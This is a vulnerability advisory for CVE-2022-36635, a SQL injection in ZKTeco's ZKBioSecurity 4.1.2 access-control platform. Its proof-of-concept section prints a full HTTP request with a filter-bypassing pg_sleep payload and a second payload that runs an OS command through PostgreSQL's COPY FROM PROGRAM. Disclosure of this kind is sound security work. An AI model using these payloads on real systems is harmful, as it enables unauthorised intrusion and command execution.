#######################ADVISORY INFORMATION#######################
Product: ZKSecurity BIO
Vendor: ZKTeco (
https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)
Version Affected: 4.1.2
CVE: CVE-2022-36635
Vulnerability: SQL Injection (with a plus: RCE)
#######################CREDIT#######################
This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.
#######################INTRODUCTION#######################
Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.
#######################VULNERABILITY DETAILS#######################
The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQL
query, with only a sanitization filter in front of it. Using comments
(/**/) in place of spaces was enough to confuse and bypass the filter.
#######################PROOF OF CONCEPT#######################
Note that the request delayed 10s:
POST /baseOpLog.do HTTP/1.1
Host: {HOST}
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION={COOKIE}; menuType=icon-only
Content-Length: 208
list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50
if you use the next query, you can execute remote command:
list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='
#######################END#######################